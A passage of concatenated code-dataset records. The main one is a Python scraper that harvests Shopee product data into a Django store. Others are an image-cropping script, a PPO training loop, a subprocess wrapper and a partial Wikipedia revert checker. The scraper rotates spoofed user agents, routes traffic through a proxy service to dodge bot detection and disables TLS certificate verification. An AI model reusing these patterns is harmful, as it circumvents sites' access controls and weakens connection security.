status=200,\n mimetype=\"application/json\")\n","sub_path":"api/advanced/team_stats.py","file_name":"team_stats.py","file_ext":"py","file_size_in_byte":5574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"568864900","text":"import os_setup\nimport threading\nimport os\nfrom random import randint\n\nimport requests\nfrom urllib3.exceptions import InsecureRequestWarning\n\nimport json\nimport time\nimport datetime\nimport pytz\nfrom random import choice\nfrom django.db.models import Q\nimport multiprocessing as mp\nfrom utils.slack import slack_notify\nfrom product.models import Product, ShopeeRating, ProductImage, ShopeeCategory,\\\n ProductSize, ProductColor, ProductExtraOption, ProductOption, ProductPattern,\\\n ShopeeColor, ShopeeSize, SourceExtraOption\nfrom helper.get_proxy_session import get_session\nfrom helper.clean_text import get_cleaned_text_from_color,\\\n get_cleaned_text, get_cleaned_text_from_pattern, \\\n get_cleaned_text_from_category, get_cleaned_text_from_size\nfrom django.shortcuts import get_object_or_404\nfrom store.models import Store, StorePost\n\n\nrequests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)\n_user_agents = [\n 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36',\n 'Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1',\n 'Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Mobile Safari/537.36',\n 'Mozilla/5.0 (Linux; Android 8.0.0; SM-G960F Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.84 Mobile Safari/537.36',\n 'Mozilla/5.0 (Linux; Android 6.0; HTC One X10 Build/MRA58K; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/61.0.3163.98 Mobile Safari/537.36',\n 'Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1',\n 'Mozilla/5.0 (X11; CrOS x86_64 8172.45.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.64 Safari/537.36',\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/601.3.9',\n 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:15.0) Gecko/20100101 Firefox/15.0.1'\n]\n\n\nclass ShopeeScraper:\n def __init__(self, user_agents=None, proxy=None):\n self.user_agents = user_agents\n proxy_host = \"proxy.crawlera.com\"\n proxy_port = \"8010\"\n proxy_auth = os.environ.get('CRAWLERA_API_KEY')\n proxies = {\"https\": \"https://{}@{}:{}/\".format(proxy_auth, proxy_host, proxy_port),\n \"http\": \"http://{}@{}:{}/\".format(proxy_auth, proxy_host, proxy_port)}\n\n self.session = requests.Session()\n self.session.proxies.update(proxies)\n self.session.headers.update({'User-Agent': self.__random_agent(),\n 'X-Requested-With': 'XMLHttpRequest',\n })\n self.proxies = proxies\n self.session_refresh_count = 0\n\n def change_session(self):\n if self.session_refresh_count > 5:\n new_session, self.proxies = get_session('new')\n self.session_refresh_count = 0\n else:\n new_session, self.proxies = get_session(proxies=self.proxies)\n self.session = new_session\n self.session_refresh_count += 1\n return new_session\n\n def __random_agent(self):\n if self.user_agents and isinstance(self.user_agents, list):\n return choice(self.user_agents)\n return choice(_user_agents)\n\n def __request_url(self, store_id, limit='100', newest='0'):\n url = 'https://shopee.vn/api/v2/search_items/?by=pop&limit={limit}&match_id={store_id}&newest={newest}&order=desc&page_type=shop&shop_categoryids=&version=2'.format(\n limit=limit, store_id=store_id, newest=newest)\n # proxy_host = \"proxy.crawlera.com\"\n # proxy_port = \"8010\"\n # proxy_auth = os.environ.get('CRAWLERA_API_KEY')+':'\n # proxies = {\"https\": \"https://{}@{}:{}/\".format(proxy_auth, proxy_host, proxy_port),\n # \"http\": \"http://{}@{}:{}/\".format(proxy_auth, proxy_host, proxy_port)}\n # headers = {'X-Crawlera-Profile': 'desktop',\n # 'X-Crawlera-JobId': '999',\n # 'X-Crawlera-Max-Retries': '1',\n # 'Referer': 'https://shopee.vn/shop/{store_id}/search'.format(store_id=store_id),\n # }\n # try:\n # response = requests.get(url, proxies=proxies, verify=False,\n # headers=headers)\n headers = {'User-Agent': choice(_user_agents),\n 'X-Requested-With': 'XMLHttpRequest',\n 'Referer': 'https://shopee.vn/shop/{store_id}/search?shopCollection='.format(store_id=store_id),\n }\n try:\n response = requests.get(url, headers=headers)\n # response.raise_for_status()\n except requests.HTTPError as e:\n print(e)\n pass\n except requests.RequestException:\n pass\n else:\n return response\n\n def __request_url_item(self, store_id, item_id):\n url = \"https://shopee.vn/api/v2/item/get?itemid={item_id}&shopid={store_id}\".format(item_id=item_id, store_id=store_id)\n proxy_host = \"proxy.crawlera.com\"\n proxy_port = \"8010\"\n proxy_auth = os.environ.get('CRAWLERA_API_KEY')+':'\n proxies = {\"https\": \"https://{}@{}:{}/\".format(proxy_auth, proxy_host, proxy_port),\n \"http\": \"http://{}@{}:{}/\".format(proxy_auth, proxy_host, proxy_port)}\n headers = {'X-Crawlera-Profile': 'desktop',\n 'X-Crawlera-JobId': '999',\n 'X-Crawlera-Max-Retries': '1',\n 'Referer': 'https://shopee.vn/shop/' +\n str(store_id) +\n '/search',\n }\n try:\n response = requests.get(url,\n proxies=proxies,\n verify=False,\n headers=headers, timeout=10)\n response.raise_for_status()\n except requests.HTTPError as e:\n print(e)\n pass\n except requests.RequestException:\n pass\n else:\n return response\n\n def __update_category(self, obj_product, categories):\n for category in categories:\n if category:\n obj_cat, is_created = ShopeeCategory.objects.get_or_create(catid=int(category['catid']),\n display_name=category['display_name'])\n obj_product.shopee_category.add(obj_cat)\n obj_cat.no_sub = category['no_sub']\n obj_cat.is_valid = category['no_sub']\n obj_cat.is_default_subcat = category['is_default_subcat']\n obj_cat.save()\n # is_valid -> 최하위 카테고리 & 분류 된 상태\n if obj_cat.is_valid:\n if obj_cat.category:\n obj_product.category = obj_cat.category\n if obj_cat.sub_category:\n obj_product.sub_category = obj_cat.sub_category\n\n if obj_product.sub_category is None:\n obj_product.validation = 'R' # 카테고리 정상 분류시 Review 로 표시\n\n def __update_rating(self, obj_product, data, view_count=0):\n obj_rating, is_created = ShopeeRating.objects.get_or_create(\n product=obj_product)\n if data['liked_count']:\n obj_rating.shopee_liked_count = data['liked_count']\n if data['historical_sold']:\n obj_rating.shopee_sold_count = data['historical_sold']\n obj_rating.shopee_view_count = view_count\n if data['item_rating']['rating_star']:\n obj_rating.shopee_rating_star = data['item_rating']['rating_star']\n if data['item_rating']['rating_count']:\n obj_rating.shopee_5_star_count = data['item_rating']['rating_count'][0]\n obj_rating.shopee_4_star_count = data['item_rating']['rating_count'][1]\n obj_rating.shopee_3_star_count = data['item_rating']['rating_count'][2]\n obj_rating.shopee_2_star_count = data['item_rating']['rating_count'][3]\n obj_rating.shopee_1_star_count = data['item_rating']['rating_count'][4]\n obj_rating.shopee_review_count = data['item_rating']['rating_count'][0]+data['item_rating']['rating_count'][1] + \\\n data['item_rating']['rating_count'][2]+data['item_rating']['rating_count'][3] + \\\n data['item_rating']['rating_count'][4]\n obj_rating.save()\n\n def __update_extra_options(self, obj_product, variation):\n options = variation['options']\n images = variation['images']\n variation_group = variation['name']\n for key, option in enumerate(options):\n option_string = option.lower().strip()\n try:\n source = 'https://cf.shopee.vn/file/' + \\\n variation['images'][key]\n source_thumb = 'https://cf.shopee.vn/file/' + \\\n variation['images'][key]+'_tn'\n except:\n source = None\n source_thumb = None\n obj_extra_option, is_created = SourceExtraOption.objects.get_or_create(\n name=option_string, source=source, source_thumb=source_thumb, variation_group=variation_group)\n obj_product.source_extra_option.add(obj_extra_option)\n\n def __update_size(self, obj_product, options):\n for option in options:\n cleaned_text = get_cleaned_text(option)\n cleaned_text = get_cleaned_text_from_category(\n get_cleaned_text_from_pattern(get_cleaned_text_from_color(cleaned_text)))\n obj_size, is_created = ShopeeSize.objects.get_or_create(\n display_name=cleaned_text)\n obj_product.shopee_size.add(obj_size)\n for size_obj in obj_product.shopee_size.all():\n if size_obj.size:\n obj_product.size.add(size_obj.size)\n else: # 사이즈 정보 중 없는 정보가 있으면 R로 변경\n obj_product.validation = 'R'\n\n def __update_color(self, obj_product, options):\n for option in options:\n cleaned_text = get_cleaned_text(option)\n cleaned_text = get_cleaned_text_from_category(\n get_cleaned_text_from_pattern(get_cleaned_text_from_size(cleaned_text)))\n obj_color, is_created = ShopeeColor.objects.get_or_create(\n display_name=cleaned_text)\n obj_product.shopee_color.add(obj_color)\n for color_obj in obj_product.shopee_color.all():\n if color_obj.color:\n obj_product.color.add(color_obj.color)\n else: # 사이즈 정보 중 없는 정보가 있으면 R로 변경\n obj_product.validation = 'R'\n\n def __update_product_option(self, obj_product, option_list,\n color_index, size_index, has_extra_options):\n free_size_obj = ProductSize.objects.get(name='free')\n u_color_obj = ProductColor.objects.get(name='undefined')\n u_size_obj = ProductSize.objects.get(name='undefined')\n # 옵션이 없는 경우 FREE SIZE OPTION 생성\n if len(option_list) == 0:\n obj_option, is_created = ProductOption.objects.get_or_create(\n product=obj_product, shopee_item_id=obj_product.shopee_item_id)\n obj_option.stock = obj_product.stock\n if obj_product.stock > 0:\n obj_option.is_active = True\n obj_product.is_active = True\n obj_product.validation = 'V'\n else:\n obj_option.is_active = False\n obj_option.original_price = obj_product.original_price\n obj_option.discount_price = obj_product.discount_price\n obj_option.currency = obj_product.currency\n obj_option.size = free_size_obj\n obj_option.save()\n else:\n not_valid_information = False\n for option in option_list:\n obj_option, is_created = ProductOption.objects.get_or_create(\n product=obj_product,\n shopee_item_id=option['modelid'])\n if is_created:\n # 옵션 생성 후에는 기본 옵션 정보 선택이 필요.\n if color_index is None and size_index is None:\n if len(option_list) == 1:\n if option['name'] == '':\n obj_option.name = 'default option(ONE SIZE)'\n else:\n obj_option.name = option['name']\n obj_option.size = free_size_obj\n obj_option.color = u_color_obj\n else:\n not_valid_information = True\n break\n else:\n obj_option.name = option['name']\n splited_list = option['name'].lower().split(',')\n if color_index != None:\n cleaned_text = get_cleaned_text(splited_list[color_index])\n cleaned_text = get_cleaned_text_from_category(\n get_cleaned_text_from_pattern(get_cleaned_text_from_size(cleaned_text)))\n obj_color, is_created = ShopeeColor.objects.get_or_create(\n display_name=get_cleaned_text(cleaned_text))\n if obj_color.color:\n obj_option.color = obj_color.color\n else:\n obj_product.validation = 'R'\n not_valid_information = True\n break\n else:\n obj_option.color = u_color_obj\n\n if size_index != None:\n cleaned_text = get_cleaned_text(splited_list[size_index])\n cleaned_text = get_cleaned_text_from_category(\n get_cleaned_text_from_pattern(get_cleaned_text_from_color(cleaned_text)))\n obj_size, is_created = ShopeeSize.objects.get_or_create(\n display_name=cleaned_text)\n if obj_size.size:\n obj_option.size = obj_size.size\n else:\n obj_product.validation = 'R'\n not_valid_information = True\n break\n else:\n obj_option.size = u_size_obj\n obj_option.is_active = option['status']\n if option['price_before_discount'] > 0:\n obj_option.original_price = option['price_before_discount'] / 100000\n obj_option.discount_price = option['price'] / 100000\n else:\n obj_option.original_price = option['price'] / 100000\n obj_option.discount_price = 0\n obj_option.currency = option['currency']\n obj_option.stock = option['stock']\n if option['stock'] == 0:\n obj_option.is_active = False\n obj_option.shopee_sold_count = option['sold']\n try:\n obj_option.save()\n except:\n not_valid_information = True\n\n if has_extra_options or not_valid_information:\n for option in option_list:\n obj_option, is_created = ProductOption.objects.get_or_create(\n product=obj_product, shopee_item_id=option['modelid'])\n obj_option.name = option['name']\n obj_option.extra_option = option['name']\n if len(option_list) == 1 and option['name'] == '':\n obj_option.name = obj_product.name\n obj_option.extra_option = obj_product.name\n obj_option.size = u_size_obj\n obj_option.color = u_color_obj\n obj_option.is_active = option['status']\n if option['price_before_discount'] > 0:\n obj_option.original_price = option['price_before_discount'] / 100000\n obj_option.discount_price = option['price'] / 100000\n else:\n obj_option.original_price = option['price'] / 100000\n obj_option.currency = option['currency']\n obj_option.stock = option['stock']\n if option['stock'] == 0:\n obj_option.is_active = False\n obj_option.shopee_sold_count = option['sold']\n try:\n obj_option.save()\n except:\n obj_product.validation = 'R'\n\n def __update_price(self, obj_product, data):\n if data['show_discount'] == 0:\n obj_product.is_discount = False\n obj_product.original_price = data['price'] / 100000\n obj_product.discount_price = 0\n obj_product.discount_rate = 0\n obj_product.currency = data['currency']\n else:\n obj_product.is_discount = True\n # price_max_before_discount #price_before_discount\n obj_product.original_price = data['price_before_discount'] / 100000\n obj_product.discount_price = data['price'] / 100000\n obj_product.discount_rate = data['show_discount']\n obj_product.currency = data['currency']\n if (obj_product.original_price == 0 or obj_product.discount_price == 0):\n slack_notify('something wrong with ' + str(obj_product.pk))\n if (data['show_free_shipping']):\n obj_product.is_free_ship = data['show_free_shipping']\n obj_product.shipping_price = 0\n else:\n obj_product.shipping_price = None\n\n def __update_pattern(self, obj_product):\n pattern_list = ProductPattern.objects.all()\n for pattern_obj in pattern_list:\n name_string = get_cleaned_text(obj_product.name)\n if get_cleaned_text(pattern_obj.name) in name_string or get_cleaned_text(pattern_obj.display_name) in name_string:\n obj_product.pattern.add(pattern_obj)\n\n def __update_images(self, obj_product, data, is_created=True):\n obj_product.product_thumbnail_image = 'https://cf.shopee.vn/file/' + \\\n data['image'] + '_tn'\n if (is_created == False):\n previous_images = ProductImage.objects.filter(product=obj_product)\n for previous_image in previous_images:\n previous_image.delete()\n for product_image in data['images']:\n obj_image, image_is_created = ProductImage.objects.get_or_create(\n source='https://cf.shopee.vn/file/' + product_image,\n source_thumb='https://cf.shopee.vn/file/' + product_image+'_tn',\n product=obj_product,\n post_image_type='P')\n\n def get_or_create_product(self, store_obj, itemid, view_count=None):\n shopid = store_obj.shopee_numeric_id\n result = ''\n # 0. 상품 생성 및 호출\n # time.sleep(randint(0, 2))\n obj_product, is_created = Product.objects.get_or_create(\n shopee_item_id=itemid, store=store_obj)\n # print('https://dabivn.com/admin/product/product/'+str(obj_product.pk))\n # 0. 상품 json load & 정상 데이터인지 확인\n data = self.__request_url_item(shopid, itemid).json()['item']\n if data['price'] % 100 != 0:\n print(data['price'])\n print('error')\n time.sleep(600)\n slack_notify('Crawler is caught by Shopee')\n return\n else:\n print(shopid, ' ', itemid, ' ', end='')\n print('0')\n # 1. 상품 삭제 확인\n if data == None:\n result = 'd'\n print('d', end='')\n obj_product.is_active = False\n obj_product.validation = 'D'\n obj_product.name = '[DELETED FROM SOURCE PAGE]' + obj_product.name\n obj_product.save()\n else:\n # TODO 재고 재 생성 확인을 해야함.\n # 2. 신규 생성 상품 처리\n color_index = None\n size_index = None\n has_extra_options = False\n if is_created:\n # 2. 기본 정보 업데이트 (상품 링크 / 상품 생성 시간 / 상품 분류 / 이름 / 이미지)\n result = 'N'\n print('N', end='')\n obj_product.validation = 'V'\n self.__update_category(obj_product, data['categories'])\n obj_product.product_link = store_obj.shopee_url + '/' + str(itemid)\n obj_product.created_at = datetime.datetime.fromtimestamp(\n int(data['ctime']), pytz.UTC)\n obj_product.product_source = 'SHOPEE'\n obj_product.name = data['name']\n obj_product.description = data['description']\n # image\n self.__update_images(obj_product, data, is_created)\n # 2. 상품 사이즈 / 컬러 정보 업데이트\n if (data['size_chart'] != None):\n obj_product.size_chart = 'https://cf.shopee.vn/file/' + data['size_chart']\n for i, variation in enumerate(data['tier_variations']):\n variation_name = variation['name'].replace(' ', '').replace(':', '').lower().strip()\n if 'size' in variation_name or 'kích' in variation_name or 'kich' in variation_name:\n self.__update_size(obj_product, variation['options'])\n size_index = i\n elif 'màu' in variation_name or 'color' in variation_name or 'mau' in variation_name:\n self.__update_color(obj_product, variation['options'])\n color_index = i\n else:\n self.__update_extra_options(obj_product, variation)\n has_extra_options = True\n if obj_product.size.count() == 0:\n self.__update_size(obj_product, ['free'])\n # 2. 패턴 추가\n self.__update_pattern(obj_product)\n else:\n result = 'u'\n if (obj_product.product_thumbnail_image != 'https://cf.shopee.vn/file/' +\n data['image'] + '_tn'):\n result = 'i'\n print('i', end='')\n self.__update_images(obj_product, data, False)\n # 3. 기존 / 신규 상품 업데이트\n # 3. 가격 및 레이팅 업데이트\n obj_product.updated_at = datetime.datetime.now()\n self.__update_price(obj_product, data)\n if view_count:\n self.__update_rating(obj_product, data, view_count)\n\n # 3. 재고 및 품절 처리\n obj_product.stock = data['stock']\n if (obj_product.stock == 0):\n obj_product.is_active = False\n obj_product.stock_available = False\n else:\n obj_product.stock_available = True\n\n # 4. 옵션 생성 및 업데이트\n self.__update_product_option(obj_product, data['models'], color_index, size_index, has_extra_options)\n obj_product.save()\n\n # 5. 생성 후 최종 검증\n if is_created:\n obj_product.is_active = False\n obj_product.save()\n return obj_product, result\n\n def search_store(self, store_obj):\n i = 0\n pk = 0\n list_length = 100\n store_id = store_obj.insta_id\n while list_length == 100:\n try:\n try_count = 0\n while True and try_count < 1:\n try_count += 1\n try:\n response = self.__request_url(store_id=store_obj.shopee_numeric_id,\n limit=list_length, newest=i*100)\n product_list = response.json()['items']\n break\n except:\n time.sleep(10)\n print('R', end='')\n for j, product in enumerate(product_list):\n try_count = 0\n while True and try_count < 10:\n try:\n product_obj, result = self.get_or_create_product(\n store_obj, product['itemid'], product['view_count'])\n break\n except:\n print('r', end='')\n # new_session = self.change_session()\n try_count += 1\n pk += 1\n list_length = len(product_list)\n i = i+1\n except:\n print('\\nERROR\\n')\n # slack_notify('Failed to get product list from {} {} ~ {}'.format(store_obj.insta_id, i * 100, (i + 1) * 100))\n break\n return pk\n#\n\n def refactor_search_store(self, store_obj):\n i = 0\n empty_result = 0\n result_string = ''\n store_id = store_obj.insta_id\n while empty_result < 3:\n # time.sleep(1+randint(0, 5)) 문제 없었음\n # time.sleep(1+randint(0, 2)) 문제 없었음\n time.sleep(1+randint(0, 1))\n try:\n response = self.__request_url(store_id=store_obj.shopee_numeric_id,\n limit=1, newest=i)\n if (len(response.json()['items']) == 1):\n product_json = response.json()['items'].pop()\n product_obj, result = self.get_or_create_product(\n store_obj, product_json['itemid'], product_json['view_count'])\n result_string = result_string+result\n else:\n empty_result += 1\n except:\n print('R', end='')\n i = i + 1\n # time.sleep(randint(0, 2))\n return i, result_string\n\n\ndef update_shopee(start_index=0, end_index=None, reverse=False):\n obj = ShopeeScraper()\n store_list = Store.objects.filter(store_type='IS').filter(is_active=True)[start_index + 1:end_index]\n results_string = 'update shopee from ' + str(start_index)\n if (end_index):\n results_string += ' to ' + str(end_index)\n for i, store_obj in enumerate(store_list):\n print(\"\\n#\" + str(i) + ' update ' + str(store_obj) + ' ')\n results_string = results_string+(\"\\n#\" + str(i) + ' update ' + str(store_obj))\n try:\n updated, result_string = obj.refactor_search_store(store_obj)\n results_string = results_string+result_string.replace('uuuuuuuuuu', 'U').replace('UUUUU', '5')\n except:\n slack_notify('Failed to update store {}'.format(store_obj.insta_id))\n # time.sleep(10+randint(0, 100)) 문제없었음\n # time.sleep(5+randint(0, 10)) 문제없었음\n # time.sleep(2+randint(0, 3))\n slack_notify(results_string)\n\n\ndef validate_shopee(start_index=0, end_index=None, reverse=False):\n obj = ShopeeScraper()\n store_list = Store.objects.filter(store_type='IS').filter(is_active=True)[start_index:end_index]\n results_string = 'validate shopee from ' + str(start_index)\n if (end_index):\n results_string += ' to ' + str(end_index)\n for i, store_obj in enumerate(store_list):\n print(\"\\n#\" + str(i) + ' validate ' + str(store_obj))\n results_string += (\"\\n#\" + str(i) + ' validate ' + str(store_obj))\n product_list = Product.objects.filter(is_active=True, store=store_obj, product_source='SHOPEE')\n for product_obj in product_list:\n try_count = 0\n # obj.get_or_create_product(store_obj, product_obj.shopee_item_id)\n while True:\n if try_count == 5:\n product_obj.is_active = False\n break\n try:\n obj.get_or_create_product(store_obj, product_obj.shopee_item_id)\n break\n except:\n try_count += 1\n time.sleep(5+randint(0, 10))\n slack_notify(results_string)\n\n\nif __name__ == '__main__':\n # pool = mp.Pool(processes=64)\n # update_shopee()\n # pool.map(obj.search_store, store_list)\n # pool.close()\n obj = ShopeeScraper()\n # obj.refactor_search_store(Store.objects.get(insta_id='su._.storee'))\n # obj.get_or_create_product(Store.objects.get(insta_id='onlyqueen.666'), 4047719428)\n # validate_shopee(181, 183)\n","sub_path":"app/crawling/shopee_c.py","file_name":"shopee_c.py","file_ext":"py","file_size_in_byte":29571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"367321534","text":"import os\nfrom os.path import join\nimport click\nfrom PIL import Image\n\n\n@click.command()\n@click.argument('renders_path')\ndef main(renders_path):\n subfolders = os.listdir(renders_path)\n for sf in subfolders:\n renders = os.listdir(join(renders_path, sf))\n for render in renders:\n render = join(renders_path, sf, render)\n im = Image.open(render)\n w, h = im.size\n tw, th = 400, 400\n if w == tw and h == th:\n continue\n\n pw = (w - tw)//2\n ph = (h - th)//2\n res = im.crop((pw, ph, pw+tw, ph+th))\n print(render)\n res.save(render)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"python/resize_dataset.py","file_name":"resize_dataset.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"505675113","text":"import argparse\nimport gym\nimport os\nimport sys\nimport pickle\nimport time\nimport datetime\nos.environ[\"OMP_NUM_THREADS\"] = \"1\"\nsys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))\n\nfrom utils import *\nfrom utils.args import *\nfrom plot.plot_logger import *\nfrom models.mlp_policy import Policy\nfrom models.mlp_critic import Value\nfrom models.mlp_policy_disc import DiscretePolicy\nfrom models.mlp_ltr import LtrPolicy\nfrom core.ppo import ppo_step\nfrom core.common import estimate_advantages\nfrom core.agent import Agent\n\ntry:\n path = os.path.join(assets_dir(), 'learned_models/{}_ppo.p'.format(args.env_name))\n models_file=open(path,'r')\n print(\"pre-trained models loaded.\")\n args.model_path = path\n print(\"model path: \", path)\nexcept IOError:\n print(\"pre-trained models not found.\")\n\nif args.log_plot is True:\n plotlogger = plot_logger()\n\ndtype = torch.float64\ntorch.set_default_dtype(dtype)\ndevice = torch.device('cuda', index=args.gpu_index) if torch.cuda.is_available() else torch.device('cpu')\nif torch.cuda.is_available():\n torch.cuda.set_device(args.gpu_index)\n\n\"\"\"environment\"\"\"\nenv = gym.make(args.env_name)\nstate_dim = env.observation_space.shape[0]\nis_disc_action = len(env.action_space.shape) == 0\n# running_state = ZFilter((state_dim,), clip=5)\n# running_reward = ZFilter((1,), demean=False, clip=10)\nrunning_state = None\n\n\"\"\"seeding\"\"\"\nseed = int(time.time())\nnp.random.seed(args.seed)\ntorch.manual_seed(args.seed)\nenv.seed(args.seed)\n\n\"\"\"define actor and critic\"\"\"\nif args.model_path is None:\n if is_disc_action:\n policy_net = DiscretePolicy(state_dim, env.action_space.n)\n else:\n policy_net = LtrPolicy(state_dim, env.action_space.shape[0], log_std=args.log_std, ltr_n=args.ltr_n)\n value_net = Value(state_dim)\nelse:\n policy_net, value_net, running_state = pickle.load(open(args.model_path, \"rb\"))\npolicy_net.to(device)\nvalue_net.to(device)\n\noptimizer_policy = torch.optim.Adam(policy_net.parameters(), lr=args.learning_rate)\noptimizer_value = torch.optim.Adam(value_net.parameters(), lr=args.learning_rate)\n\n# # optimization epoch number and batch size for PPO\n# optim_epochs = 10\n# optim_batch_size = 64\n\n\"\"\"create agent\"\"\"\nagent = Agent(env, policy_net, device, running_state=running_state, render=args.render, num_threads=args.num_threads)\n\n\ndef update_params(batch, i_iter):\n states = torch.from_numpy(np.stack(batch.state)).to(dtype).to(device)\n actions = torch.from_numpy(np.stack(batch.action)).to(dtype).to(device)\n rewards = torch.from_numpy(np.stack(batch.reward)).to(dtype).to(device)\n masks = torch.from_numpy(np.stack(batch.mask)).to(dtype).to(device)\n repeats = torch.from_numpy(np.stack(batch.repeat)).to(dtype).to(device)\n with torch.no_grad():\n values = value_net(states)\n fixed_log_probs, fixed_rpt_log_probs = policy_net.get_log_prob(states, actions, repeats)\n\n \"\"\"get advantage estimation from the trajectories\"\"\"\n advantages, returns = estimate_advantages(repeats, rewards, masks, values, args.gamma, args.tau, device)\n\n \"\"\"perform mini-batch PPO update\"\"\"\n optim_iter_num = int(math.ceil(states.shape[0] / optim_batch_size))\n for _ in range(optim_epochs):\n perm = np.arange(states.shape[0])\n np.random.shuffle(perm)\n perm = LongTensor(perm).to(device)\n\n states, actions, returns, advantages, repeats, fixed_log_probs, fixed_rpt_log_probs = \\\n states[perm].clone(), actions[perm].clone(), returns[perm].clone(), advantages[perm].clone(), repeats[perm].clone(), fixed_log_probs[perm].clone(), fixed_rpt_log_probs[perm].clone()\n\n for i in range(optim_iter_num):\n ind = slice(i * optim_batch_size, min((i + 1) * optim_batch_size, states.shape[0]))\n states_b, actions_b, advantages_b, returns_b, repeats_b, fixed_log_probs_b, fixed_rpt_log_probs_b = \\\n states[ind], actions[ind], advantages[ind], returns[ind], repeats[ind], fixed_log_probs[ind], fixed_rpt_log_probs[ind]\n\n ppo_step(policy_net, value_net, optimizer_policy, optimizer_value, 1, states_b, actions_b, returns_b, \n advantages_b, repeats_b, fixed_log_probs_b, fixed_rpt_log_probs_b, args.clip_epsilon, args.l2_reg)\n\n\ndef main_loop():\n for i_iter in range(args.max_iter_num):\n \"\"\"generate multiple trajectories that reach the minimum batch_size\"\"\"\n batch, log = agent.collect_samples(args.min_batch_size)\n t0 = time.time()\n update_params(batch, i_iter)\n t1 = time.time()\n\n if i_iter % args.log_interval == 0:\n print('{}\\tT_sample {:.4f}\\tT_update {:.4f}\\tR_min {:.2f}\\tR_max {:.2f}\\tR_avg {:.2f}'.format(\n i_iter, log['sample_time'], t1-t0, log['min_reward'], log['max_reward'], log['avg_reward']))\n if args.log_plot is True:\n plotlogger.log(n=i_iter, r_min=log['min_reward'], r_max=log['max_reward'], r_avg=log['avg_reward'])\n\n if args.save_model_interval > 0 and (i_iter+1) % args.save_model_interval == 0:\n to_device(torch.device('cpu'), policy_net, value_net)\n pickle.dump((policy_net, value_net, running_state),\n open(os.path.join(assets_dir(), 'learned_models/{}_ppo.p'.format(args.env_name)), 'wb'))\n to_device(device, policy_net, value_net)\n print(\"model saved!\")\n\n if args.log_plot is True and i_iter%args.log_plot_steps==0 and i_iter>=args.log_plot_steps:\n logplot_path = os.path.join(assets_dir(), 'learned_models/')\n with open(os.path.join(logplot_path+\"logplot\"+str(datetime.datetime.now())+\".pkl\"), \"wb\") as f: pickle.dump(plotlogger._log, f, pickle.HIGHEST_PROTOCOL)\n print(\"plot log succeed.\")\n args.log_plot = False\n exit()\n\n \"\"\"clean up gpu memory\"\"\"\n torch.cuda.empty_cache()\n\n\nmain_loop()\n","sub_path":"train/ltr.py","file_name":"ltr.py","file_ext":"py","file_size_in_byte":5888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"33149419","text":"import subprocess\nfrom pathlib import Path\n\nif __name__ == '__main__':\n path = Path(__file__)\n dir_path = path.parent.resolve()\n text_path = dir_path / 'text.txt'\n config_path = dir_path / 'config.yml'\n exec_path = dir_path.parent.parent / 'hercules-extraction.py'\n\n out_path = dir_path / 'translation_extraction_coreference_export_sample.ttl'\n\n cp = subprocess.run(['python', str(exec_path), '--file', str(text_path), '--config', str(config_path), '--out', str(out_path)], shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)\n\n print('stdout:')\n print(cp.stdout)\n print('stderr:')\n print(cp.stderr)\n","sub_path":"sample/translation_extraction_coreference_export/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"141333195","text":"import random\nfrom revscoring.features import wikitext, revision_oriented, temporal\nfrom revscoring.languages import english\nfrom revscoring.extractors import api\nfrom revscoring.utilities.util import read_observations\nimport mwapi\nimport json\nimport sys, traceback\nimport mwreverts.api\n\nsession = mwapi.Session('https://en.wikipedia.org')\nrev_reverteds = []\nflag = True\nwhile flag == True:\n revid = random.randint(700000000, 900000000)\n try:\n _, reverted, reverted_to = mwreverts.api.check(\n session, revid, radius=5, # most reverts within 5 edits\n window=48 * 60 * 60, # 2 days\n rvprop={'user', 'ids'}) # Some properties we'll make use of\n flag = False\n except (RuntimeError, KeyError) as e:\n #sys.stderr.write(str(e))\n print('Revision ID ' + str(revid) + ' does not exist')\n \nif reverted is not None:\n reverted_doc = [r for r in reverted.reverteds if r['revid'] == revid][0]\n if 'user' not in reverted_doc or 'user' not in reverted.reverting:\n None\n self_revert = reverted_doc['user'] == reverted.reverting['user']\n # revisions that are reverted back to by others\n reverted_back_to = reverted_to is not None and 'user' in reverted_to.reverting and reverted_doc['user'] != reverted_to.reverting['user']\n # If we are reverted, not by self or reverted back to by someone else,\n # then, let's assume it was damaging.\n damaging_reverted = not (self_revert or reverted_back_to)\nelse:\n damaging_reverted = False\n \nif reverted is None:\n rev_reverteds.append(('N/A', revid, 'N/A', damaging_reverted)) # Before Rev, Current Rev, After Rev\nelif reverted is not None:\n\n rev_reverteds.append((reverted.reverteds[0]['parentid'], reverted.reverting['revid'], reverted.reverting['revid'],\n damaging_reverted))\n # Before Rev, Before User, Current Rev, Current User, After Rev, After User\n#sys.stderr.write(\"r\" if damaging_reverted else \".\")\n\nfeatures = [\n # Catches long key mashes like kkkkkkkkkkkk\n wikitext.revision.diff.longest_repeated_char_added,\n # Measures the size of the change in added words\n 